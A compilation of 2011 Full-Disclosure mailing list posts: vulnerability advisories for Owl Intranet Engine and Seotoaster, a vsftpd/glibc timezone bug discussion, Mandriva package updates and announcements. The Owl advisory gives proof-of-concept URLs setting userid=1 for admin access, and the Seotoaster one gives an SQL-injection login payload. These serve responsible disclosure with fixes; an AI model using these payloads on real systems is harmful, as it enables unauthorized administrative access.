[Full-disclosure] [RT-SA-2011-005] Owl Intranet Engine: Authentication Bypass
Advisory: Owl Intranet Engine: Authentication Bypass During a penetration test, RedTeam Pentesting discovered an Authentication Bypass vulnerability in the Owl Intranet Engine, which allows unauthenticated users administrative access to the affected systems. Details === Product: Owl Intranet Engine Affected Versions: 1.00, possibly all older versions Fixed Versions: 1.01 Vulnerability Type: Authentication Bypass Security Risk: high Vendor URL: http://owl.anytimecomm.com Vendor Status: fixed version released Advisory URL: http://www.redteam-pentesting.de/advisories/rt-sa-2011-005 Advisory Status: published CVE: GENERIC-MAP-NOMATCH CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH Introduction Owl is a multi user document repository (knowledge base) system written in PHP for publishing files/documents onto the web for a corporation, small business, group of people, or just for yourself. (From the vendor's homepage) More Details The Owl Intranet Engine implements an adminstrative interface, allowing users in the Administrators group to add and edit users and generally maintain the Owl system. By default, a guest account is activated, that can be used for anonymous read-only access. Under normal circumstances, no user is allowed access to the system if authentication or authorisation fails. If however the guest account on the system is deactivated (option Disable User), it is possible to completely bypass authentication and authorisation and gain access to the admin area. Calling a web page belonging to the administrative interface first of all checks if a user is authorised to view this page. For this purpose, the function fIsAdmin(true) in lib/owl.lib.php is called. If the return value is false, the PHP function die() is called, showing a message to the user that he or she is not authorized to view this page. If the return value is true and the guest access is disabled though, the PHP function header() is used to redirect the user to the login page without using die() to prevent the page to be built. If the browser is configured to not follow the redirect, the whole page content is shown to the attacker. As the Owl Intranet Engine uses the PHP function extract() on the global arrays $_POST and $_GET, it is possible to set the value of the global variable $userid by passing it as a GET variable. Appending the string ?userid=VALUE to the URL allows to set an arbitrary value for the userid. The initial admin user always has the id 1, so this value can be used to get an administrative user's id. In the fIsAdmin() function, the access rights of the user are checked using the query SELECT userid,groupid from membergroup where userid = '$userid' and groupid = '0' The $userid variable now contains the global value 1 set via the GET request, so the query returns true and the requested page is loaded in the attacker's browser. Proof of Concept A web browser that does not follow redirects is needed, for example Firefox with the NoRedirect extension installed and activated. The following URL displays the UsersGroups tab of the administrative interface: http://www.example.org/owl/admin/index.php?userid=1 The next URL displays the mask for adding new users to the system: http://www.example.org/owl/admin/index.php?userid=1newuser This URL allows direct editing of the default administrator account: http://www.example.org/owl/admin/index.php?userid=1action=edituserowluser=1 Workaround == A possible workaround would be to add a call to exit() after every header() call used for redirecting. This way, no page content will be displayed. The default value of the variable $userid should also be set to a sane default value after the call to the extract() function on the global $_GET and $_POST arrays. Fix === Upgrade to version 1.01. Security Risk = This vulnerability allows unauthenticated and unauthorised users to access the Owl Intranet Engine with administrative access rights, allowing them to fully control the affected system. History === 2011-05-29 Vulnerability identified 2011-07-26 Customer approved disclosure to vendor 2011-10-31 Vendor notified 2011-11-30 Vendor released fixed version and notifies customer base 2011-12-15 Advisory released RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at http://www.redteam-pentesting.de. ___
[Full-disclosure] [RT-SA-2011-006] Owl Intranet Engine: Information Disclosure and Unsalted Password Hashes
Advisory: Owl Intranet Engine: Information Disclosure and Unsalted Password Hashes The Owl Intranet Engine uses no salting in the password hashing procedure. Furthermore, users in the Administrators group are able to see the MD5 password hashes of every user using the web interface. Details === Product: Owl Intranet Engine Affected Versions: 1.01, possibly all older versions Fixed Versions: none Vulnerability Type: Information Disclosure, Unsalted Password Hashes Security Risk: low Vendor URL: http://owl.anytimecomm.com Vendor Status: decided not to fix Advisory URL: http://www.redteam-pentesting.de/advisories/rt-sa-2011-006 Advisory Status: published CVE: GENERIC-MAP-NOMATCH CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH Introduction Owl is a multi user document repository (knowledge base) system written in PHP for publishing files/documents onto the web for a corporation, small business, group of people, or just for yourself. (From the vendor's homepage) More Details The administrative interface of the Owl Intranet Engine allows users in the Administrators group to edit user accounts over the UsersGroups tab. If a user is selected for editing, all account information is shown. In this overview, the password field is filled with the MD5 hash value of the old user password, as can be seen in the HTML sources. This allows users with administrative access to the Owl Intranet Engine to see the password hashes of every user. Furthermore, no salting is used when the password hashes are generated, allowing a rainbow tables attack against user passwords. Fix === None. Security Risk = This vulnerability allows administrative users to collect the MD5 password hashes of every user of the affected Owl Intranet Engine system through the administrative interface. Because no salting is employed, a rainbow tables attack can be run against the collected password hashes and the password values can possibly be recovered in a short time. The risk potential is however deemed to be low, as users with administrative access to the OWL Intranet Engine already have extensive access rights. History === 2011-05-29 Vulnerability identified 2011-07-26 Customer approved disclosure to vendor 2011-10-31 Vendor notified 2011-11-30 Vendor releases new version that does not fix the issue 2011-12-15 Advisory released RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at http://www.redteam-pentesting.de. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] New IETF I-D on Stable Privacy Addresses
Folks, We've just published a new IETF I-D entitled A method for Generating Stable Privacy-Enhanced Addresses with IPv6 Stateless Address Autoconfiguration (SLAAC). The abstract of the I-D is: cut here This document specifies a method for generating IPv6 Interface Identifiers to be used with IPv6 Stateless Address Autoconfiguration (SLAAC), such that addresses configured using this method are stable within each subnet, but the Interface Identifier changes when hosts move from one network to another. The aforementioned method is meant to be an alternative to generating Interface Identifiers based on IEEE identifiers, such that the same manageability benefits can be achieved without sacrificing the privacy of users. cut here The aforementioned I-D is available at: http://tools.ietf.org/id/draft-gont-6man-stable-privacy-addresses-00.txt. Any feedback will be really appreciated. P.S.: Also, feel free to discuss the I-D on the ipv6hackers mailing-list http://lists.si6networks.com/listinfo/ipv6hackers/ Thanks! Best regards, -- Fernando Gont SI6 Networks e-mail: fg...@si6networks.com PGP Fingerprint: 31C6 D484 63B2 8FB1 E3C4 AE25 0D55 1D4E 7492 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] vsFTPd remote code execution
Hi Chris,
Am 14. Dezember 2011 08:21 schrieb Chris Evans scarybea...@gmail.com:
On Tue, Dec 13, 2011 at 12:11 PM, HI-TECH .
isowarez.isowarez.isowa...@googlemail.com wrote:
Yes you are somewhat right, as this is the old discussion about if
code execution inside an ftpd
is a vulnerability itself or only local code execution. I have the
opinion that an ftpd which does not allow to run code
should restrict the user so, and if there is a way to execute code it
it is a vulnerability.
Take the example of a vsftpd configured for anonymous ftp and write
access in /var/ftp.
IIRC, vsftpd can refuse to start an anonymous session for the
misconfiguration where the root directory is writeable (to avoid
problems in the libc like this). I'll make sure it still works and
maybe check other paths such as /etc
thats indeed true, nevertheless I have seen boxes in the wild
with vsftpd running with anonymous and write access in
/var/ftp, maybe because this security measure was built into
vsftpd in newer versions ? I am not sure.
For local users, there's a configuration setting: chroot_local_user.
The compiled-in default is false, and the man page cautions:
---
.BR Warning:
This option has security implications, especially if the users have upload
permission, or shell access. Only enable if you know what you are doing.
---
I'm not uptodate with whether Linux distributions have turned this on
by default or not.
I think it is not the default setting but many admins will make use of it in
hosting environments.
vsftpd does have the concept of virtual users. I'm not sure if it's
widely used but it seems that this type of user login would present
the biggest headache.
Amusingly, vsftpd already attempts to desist glibc from loading any
timezone files from inside the chroot() (see env_init) by warming up
the subsystem and even explicitly setting TZ in the environment. glibc
displeases me. Perhaps it's a gmtime() vs. localtime() issue -- I'm
curious to know if glibc still crashes if the setting
use_localtime=YES is used?
I havent checked that but as you said in a private conversation
cacheing the zoneinfo file through glibc beforehand makes the zoneinfo file
usage disappear in my strace output.
I don't mind adding workarounds or avoidances for libc bugs (for
example, functions like regcomp, fnmatch have long been avoided). If
you had any clever ideas, I'm happy to put them in, otherwise it's a
case of waiting for the glibc updates.
For me it is a miracle why this bug was not patched in glibc back in 2009.
Here is the patch by you Chris I hope I can go ahead and post it here
on full disclosure
as this might get into a new release anyways (use at your own risk!):
Add this to the very bottom of vsf_sysutil_tzset():
---snip---
p_tm = localtime(the_time);
if (p_tm == NULL)
{
die(localtime #2);
}
p_tm = gmtime(the_time);
if (p_tm == NULL)
{
die(gmtime);
}
---snip---
Regards,
Kingcope
Cheers
Chris
The attacker might
execute code using the vulnerability without authentication
credentials, or for example an attacker only has
access to a user account configured for ftp.
Basically you are right, vsftpd uses privsep so its a not so risky
vulnerability.
/Kingcope
Am 13. Dezember 2011 20:56 schrieb Dan Rosenberg dan.j.rosenb...@gmail.com:
Anyone with an up2date linux local root which only makes use of syscalls?
:
This is all fun stuff, and definitely worth looking into further, but
if you've got a local kernel exploit that you can trigger from inside
vsftpd, you don't need this (potential) vulnerability in vsftpd - you
already win.
-Dan
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] More on exploiting glibc __tzfile_read integer overflow to buffer overflow and vsftpd
More on exploiting glibc __tzfile_read integer overflow to buffer overflow and vsftpd http://rcvalle.com/post/14261796328/more-on-exploiting-glibc-tzfile-read-integer-overflow -- Ramon de C Valle / Red Hat Security Response Team ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Announcement] ClubHack Mag Issue 23- December 2011 Released
Dear All, Here are with the Issue-23, December 2011 of ClubHack Magazine. The poster of the magazine was released at recently held ClubHack 2011 Hacking conference. This issue covers following articles:- 0x00 Tech Gyan - GSM 0x01 Tool Gyan - Echo Mirage 0x02 Mom's Guide - OWASP Mobile Security Project 0x03 Legal Gyan - Reasonable Security Practices under Information Technology (Amendment) Act, 2008 0x04 Matriux Vibhag - Forensics – Part III 0x05 Poster - Mobile Warfare Check http://chmag.in/ for articles. PDF version can be download from:- http://chmag.in/issue/dec2011.pdf Coming to ClubHack 2011 Conference, the presentations are available at: http://www.slideshare.net/clubhack and videos at: http://clubhack.tv/event/2011 Send us your feedback at i...@chmag.in Regards, Abhijeet Patil, ClubHack http://chmag.in http://clubhack.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2011:187 ] php-pear
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2011:187 http://www.mandriva.com/security/ ___ Package : php-pear Date: December 15, 2011 Affected: 2010.1, Enterprise Server 5.0 ___ Problem Description: A vulnerability has been discovered and corrected in php-pear: The installer in PEAR before 1.9.2 allows local users to overwrite arbitrary files via a symlink attack on the package.xml file, related to the (1) download_dir, (2) cache_dir, (3) tmp_dir, and (4) pear-build-download directories, a different vulnerability than CVE-2007-2519 (CVE-2011-1072). This advisory provides PEAR 1.9.4 which is not vulnerable to this issue. Additionally for Mandriva Enterprise Server 5 many new or updated PEAR packages is being provided with the latest versions of respective packages as well as mitigating various dependency issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1072 ___ Updated Packages: Mandriva Linux 2010.1: d9056b432515298ea3459a1d0dd314c2 2010.1/i586/php-pear-1.9.4-0.1mdv2010.2.noarch.rpm eaf5ade94e635cb3e8bf6b814b4d60f3 2010.1/SRPMS/php-pear-1.9.4-0.1mdv2010.2.src.rpm Mandriva Linux 2010.1/X86_64: 65e5a84bedbed40be7093e3bbdea2ef5 2010.1/x86_64/php-pear-1.9.4-0.1mdv2010.2.noarch.rpm eaf5ade94e635cb3e8bf6b814b4d60f3 2010.1/SRPMS/php-pear-1.9.4-0.1mdv2010.2.src.rpm Mandriva Enterprise Server 5: 5779054bb6507fed3dc57d6d5acd59b0 mes5/i586/php-pear-1.9.4-0.1mdvmes5.2.noarch.rpm cb900fcca60528cea132ebc13c80906d mes5/i586/php-pear-Auth-1.6.4-0.1mdvmes5.2.noarch.rpm cc6f65ee506b1447c0b731e5daf3737a mes5/i586/php-pear-Auth_RADIUS-1.0.7-0.1mdvmes5.2.noarch.rpm 898a706dea6c53839bd9f511b133ad6f mes5/i586/php-pear-Auth_SASL-1.0.6-0.1mdvmes5.2.noarch.rpm cbcf597d64cbde0620f356428cf85b9c mes5/i586/php-pear-Cache_Lite-1.7.12-0.1mdvmes5.2.noarch.rpm a927787fd35ae5aabd5d16c809fa4052 mes5/i586/php-pear-Console_ProgressBar-0.5.2beta-0.1mdvmes5.2.noarch.rpm b3095e751b4d3ae849a0d489459babcb mes5/i586/php-pear-Crypt_CHAP-1.5.0-0.1mdvmes5.2.noarch.rpm 424e58e6c5827b07ba211718dc51776d mes5/i586/php-pear-Date-1.5.0a2-0.1mdvmes5.2.noarch.rpm 988dd5ed73222d3707d39ca2a868a887 mes5/i586/php-pear-Date_Holidays-0.21.5-0.1mdvmes5.2.noarch.rpm b5fc2aae1f7b787ea88f818a11fe9e92 mes5/i586/php-pear-Date_Holidays_Austria-0.1.3-0.1mdvmes5.2.noarch.rpm 3a93ad9120c162c71cdbd3de63e04781 mes5/i586/php-pear-Date_Holidays_Brazil-0.1.2-0.1mdvmes5.2.noarch.rpm cea9ba4009c04872246b9365b117e7df mes5/i586/php-pear-Date_Holidays_Denmark-0.1.3-0.1mdvmes5.2.noarch.rpm fc000c989817f67990fe7f8b9a3b8815 mes5/i586/php-pear-Date_Holidays_Discordian-0.1.1-0.1mdvmes5.2.noarch.rpm 612e97c5374d79748cd5c8bc17bf7546 mes5/i586/php-pear-Date_Holidays_EnglandWales-0.1.2-0.1mdvmes5.2.noarch.rpm 736b242a65a0ac5415c930e18de3c27d mes5/i586/php-pear-Date_Holidays_Germany-0.1.2-0.1mdvmes5.2.noarch.rpm b0df3150a85f1e201a361e89243587bd mes5/i586/php-pear-Date_Holidays_Iceland-0.1.2-0.1mdvmes5.2.noarch.rpm 7d61dc88b7fea3467c1f90a30ba88798 mes5/i586/php-pear-Date_Holidays_Italy-0.1.1-0.1mdvmes5.2.noarch.rpm 974c95144927d854778ea5c4b0dc9868 mes5/i586/php-pear-Date_Holidays_Japan-0.1.1-0.1mdvmes5.2.noarch.rpm 40d4af52e3b3cd54477f6c055b0619c4 mes5/i586/php-pear-Date_Holidays_Netherlands-0.1.2-0.1mdvmes5.2.noarch.rpm 6006d2ac25e104c65c9718694a5a9157 mes5/i586/php-pear-Date_Holidays_Norway-0.1.2-0.1mdvmes5.2.noarch.rpm 1b934b61f2bdbaa44e3f0b320269805b mes5/i586/php-pear-Date_Holidays_PHPdotNet-0.1.2-0.1mdvmes5.2.noarch.rpm 4ab10f9985837f7e39100d54bca82717 mes5/i586/php-pear-Date_Holidays_Romania-0.1.2-0.1mdvmes5.2.noarch.rpm ed816908d5d1a9b3e12db7cce2966df6 mes5/i586/php-pear-Date_Holidays_Slovenia-0.1.2-0.1mdvmes5.2.noarch.rpm b0c23ec3be7b34cd7f042f9787c7d4ea mes5/i586/php-pear-Date_Holidays_Sweden-0.1.2-0.1mdvmes5.2.noarch.rpm 4bc6b95b9bf650337be0fdfed8916c04 mes5/i586/php-pear-Date_Holidays_Ukraine-0.1.2-0.1mdvmes5.2.noarch.rpm c4d0938a8d78ec9c6810d06edb79737e mes5/i586/php-pear-Date_Holidays_UNO-0.1.3-0.1mdvmes5.2.noarch.rpm 1f854daf44aea34ffd93585615905a37 mes5/i586/php-pear-Date_Holidays_USA-0.1.1-0.1mdvmes5.2.noarch.rpm 471bf07eb2e5e80783273ca4f2a26b45 mes5/i586/php-pear-DB-1.7.14-0.1mdvmes5.2.noarch.rpm 73d16fb47e151b0d6b085d25b78c9def mes5/i586/php-pear-DB_DataObject-1.9.6-0.1mdvmes5.2.noarch.rpm 9bdca0d49f65f340b7f376d59a0840f3 mes5/i586/php-pear-File_Passwd-1.1.7-0.1mdvmes5.2.noarch.rpm 871f3f7eecc12bc589a490df0191f874 mes5/i586/php-pear-File_SMBPasswd-1.0.3-0.1mdvmes5.2.noarch.rpm
Re: [Full-disclosure] vsFTPd remote code execution
There is guides, like;
http://blog.up-link.ro/how-to-set-up-vsftpd-virtual-users-berkeley-db-pam/
wich is folwing this trend...to create a var/ftp/public or
var/ftp/user , wich is great...if your not running vsftpd...
On 16 December 2011 00:39, HI-TECH .
isowarez.isowarez.isowa...@googlemail.com wrote:
Hi Chris,
Am 14. Dezember 2011 08:21 schrieb Chris Evans scarybea...@gmail.com:
On Tue, Dec 13, 2011 at 12:11 PM, HI-TECH .
isowarez.isowarez.isowa...@googlemail.com wrote:
Yes you are somewhat right, as this is the old discussion about if
code execution inside an ftpd
is a vulnerability itself or only local code execution. I have the
opinion that an ftpd which does not allow to run code
should restrict the user so, and if there is a way to execute code it
it is a vulnerability.
Take the example of a vsftpd configured for anonymous ftp and write
access in /var/ftp.
IIRC, vsftpd can refuse to start an anonymous session for the
misconfiguration where the root directory is writeable (to avoid
problems in the libc like this). I'll make sure it still works and
maybe check other paths such as /etc
thats indeed true, nevertheless I have seen boxes in the wild
with vsftpd running with anonymous and write access in
/var/ftp, maybe because this security measure was built into
vsftpd in newer versions ? I am not sure.
For local users, there's a configuration setting: chroot_local_user.
The compiled-in default is false, and the man page cautions:
---
.BR Warning:
This option has security implications, especially if the users have upload
permission, or shell access. Only enable if you know what you are doing.
---
I'm not uptodate with whether Linux distributions have turned this on
by default or not.
I think it is not the default setting but many admins will make use of it in
hosting environments.
vsftpd does have the concept of virtual users. I'm not sure if it's
widely used but it seems that this type of user login would present
the biggest headache.
Amusingly, vsftpd already attempts to desist glibc from loading any
timezone files from inside the chroot() (see env_init) by warming up
the subsystem and even explicitly setting TZ in the environment. glibc
displeases me. Perhaps it's a gmtime() vs. localtime() issue -- I'm
curious to know if glibc still crashes if the setting
use_localtime=YES is used?
I havent checked that but as you said in a private conversation
cacheing the zoneinfo file through glibc beforehand makes the zoneinfo file
usage disappear in my strace output.
I don't mind adding workarounds or avoidances for libc bugs (for
example, functions like regcomp, fnmatch have long been avoided). If
you had any clever ideas, I'm happy to put them in, otherwise it's a
case of waiting for the glibc updates.
For me it is a miracle why this bug was not patched in glibc back in 2009.
Here is the patch by you Chris I hope I can go ahead and post it here
on full disclosure
as this might get into a new release anyways (use at your own risk!):
Add this to the very bottom of vsf_sysutil_tzset():
---snip---
p_tm = localtime(the_time);
if (p_tm == NULL)
{
die(localtime #2);
}
p_tm = gmtime(the_time);
if (p_tm == NULL)
{
die(gmtime);
}
---snip---
Regards,
Kingcope
Cheers
Chris
The attacker might
execute code using the vulnerability without authentication
credentials, or for example an attacker only has
access to a user account configured for ftp.
Basically you are right, vsftpd uses privsep so its a not so risky
vulnerability.
/Kingcope
Am 13. Dezember 2011 20:56 schrieb Dan Rosenberg
dan.j.rosenb...@gmail.com:
Anyone with an up2date linux local root which only makes use of syscalls?
:
This is all fun stuff, and definitely worth looking into further, but
if you've got a local kernel exploit that you can trigger from inside
vsftpd, you don't need this (potential) vulnerability in vsftpd - you
already win.
-Dan
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2011:188 ] libxml2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2011:188 http://www.mandriva.com/security/ ___ Package : libxml2 Date: December 15, 2011 Affected: 2010.1, 2011., Enterprise Server 5.0 ___ Problem Description: Multiple vulnerabilities has been discovered and corrected in libxml2: Off-by-one error in libxml allows remote attackers to execute arbitrary code or cause a denial of service (heap-based buffer overflow and application crash) via a crafted web site CVE-2011-0216). libxml2 allows remote attackers to cause a denial of service (out-of-bounds read) via unspecified vectors (CVE-2011-3905). The updated packages have been patched to correct these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0216 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3905 ___ Updated Packages: Mandriva Linux 2010.1: 23ef99787f1b7ef3e64bc0762f3f3a4e 2010.1/i586/libxml2_2-2.7.7-1.5mdv2010.2.i586.rpm feb02c6f36c8583a5bc2854f0433fe86 2010.1/i586/libxml2-devel-2.7.7-1.5mdv2010.2.i586.rpm b706e84011c20d382a18a086894dca2b 2010.1/i586/libxml2-python-2.7.7-1.5mdv2010.2.i586.rpm b963f6ab4f39336a51a0471de5c0a9da 2010.1/i586/libxml2-utils-2.7.7-1.5mdv2010.2.i586.rpm dc474dd86bf91fbb13fcd8968a27194f 2010.1/SRPMS/libxml2-2.7.7-1.5mdv2010.2.src.rpm Mandriva Linux 2010.1/X86_64: a61db16fd54c0fda75a5c0268d3524bd 2010.1/x86_64/lib64xml2_2-2.7.7-1.5mdv2010.2.x86_64.rpm 4f2fd97b4bbab696fae212559295516f 2010.1/x86_64/lib64xml2-devel-2.7.7-1.5mdv2010.2.x86_64.rpm 8064e2b0a5d5525c533be6cd61f20293 2010.1/x86_64/libxml2-python-2.7.7-1.5mdv2010.2.x86_64.rpm d1aab22793a453e2fbaa6bc2c05b0de0 2010.1/x86_64/libxml2-utils-2.7.7-1.5mdv2010.2.x86_64.rpm dc474dd86bf91fbb13fcd8968a27194f 2010.1/SRPMS/libxml2-2.7.7-1.5mdv2010.2.src.rpm Mandriva Linux 2011: 8d0ea419886a45a7d2106d1f697fb0af 2011/i586/libxml2_2-2.7.8-6.3-mdv2011.0.i586.rpm bbd914f659c2ea83a438eddcd3c31292 2011/i586/libxml2-devel-2.7.8-6.3-mdv2011.0.i586.rpm 9cc5144f6394ef736686b81087aea4a3 2011/i586/libxml2-python-2.7.8-6.3-mdv2011.0.i586.rpm 221cd5a0cef6bd5a651469811977dd1a 2011/i586/libxml2-utils-2.7.8-6.3-mdv2011.0.i586.rpm f2683b77635f1ee49afff8cb8ad2e470 2011/SRPMS/libxml2-2.7.8-6.3.src.rpm Mandriva Linux 2011/X86_64: 7a2de229452cbb4478f81a2a0c8f95f7 2011/x86_64/lib64xml2_2-2.7.8-6.3-mdv2011.0.x86_64.rpm f7de6d69fe1b4da9cddafce53db848e5 2011/x86_64/lib64xml2-devel-2.7.8-6.3-mdv2011.0.x86_64.rpm d90a089bcbcff95fd5db9b5a41eb0344 2011/x86_64/libxml2-python-2.7.8-6.3-mdv2011.0.x86_64.rpm 65b6d64de1c97b977d9b0264e9520623 2011/x86_64/libxml2-utils-2.7.8-6.3-mdv2011.0.x86_64.rpm f2683b77635f1ee49afff8cb8ad2e470 2011/SRPMS/libxml2-2.7.8-6.3.src.rpm Mandriva Enterprise Server 5: d0c8c07632d01258639be4b038ab75d4 mes5/i586/libxml2_2-2.7.1-1.9mdvmes5.2.i586.rpm d8e7605a3fb748bc7c5c0f577ffbe7b4 mes5/i586/libxml2-devel-2.7.1-1.9mdvmes5.2.i586.rpm 677c93e393fe0004d1a2e543e498555d mes5/i586/libxml2-python-2.7.1-1.9mdvmes5.2.i586.rpm d9b1ba626d9514b26a3bf86719dfc62f mes5/i586/libxml2-utils-2.7.1-1.9mdvmes5.2.i586.rpm c307b638da506db8346e1f790f39d772 mes5/SRPMS/libxml2-2.7.1-1.9mdvmes5.2.src.rpm Mandriva Enterprise Server 5/X86_64: d8062c5526c39d22f819f2f70d104d2d mes5/x86_64/lib64xml2_2-2.7.1-1.9mdvmes5.2.x86_64.rpm 12eabde65491a7f6883247a27b239a97 mes5/x86_64/lib64xml2-devel-2.7.1-1.9mdvmes5.2.x86_64.rpm 728ad366c8f67640a50b6bb6f7260684 mes5/x86_64/libxml2-python-2.7.1-1.9mdvmes5.2.x86_64.rpm f91719adff8bc425c66930f5d0aa81a3 mes5/x86_64/libxml2-utils-2.7.1-1.9mdvmes5.2.x86_64.rpm c307b638da506db8346e1f790f39d772 mes5/SRPMS/libxml2-2.7.1-1.9mdvmes5.2.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux)
[Full-disclosure] Seotoaster SQL-Injection Admin Login Bypass
Advisory: Seotoaster SQL-Injection Admin Login Bypass Advisory ID:INFOSERVE-ADV2011-06 Author: Stefan Schurtz Contact:secur...@infoserve.de Affected Software: Successfully tested on Seotoaster v.1.9 Vendor URL: http://www.seotoaster.com/ Vendor Status: fixed == Vulnerability Description == Seotoaster v.1.9 is prone to an SQL-Injection which bypass the admin login == PoC-Exploit == http://target/seotoaster/go User: ' or 1=1)# PW: notimportant = Solution = Upgrade to the latest version Disclosure Timeline 15-Nov-2011 - Secunia SVCRP (v...@secunia.com) 15-Dec-2011 - fixed by vendor Credits Vulnerabilitiy found and advisory written by the INFOSERVE security team. === References === http://secunia.com/advisories/46881/ http://www.infoserve.de/system/files/advisories/INFOSERVE-ADV2011-06.txt Best regards, Stefan Schurtz | SECURE INFRASTRUCTURE INFOSERVE GmbH | Am Felsbrunnen 15 | D-66119 Saarbrücken Fon +49 (0)681 88008-52 | Fax +49 (0)681 88008-33 | s.schu...@infoserve.de | www.infoserve.de Handelsregister: Amtsgericht Saarbrücken, HRB 11001 | Erfüllungsort: Saarbrücken Geschäftsführer: Dr. Stefan Leinenbach | Ust-IdNr.: DE168970599 smime.p7s Description: S/MIME cryptographic signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
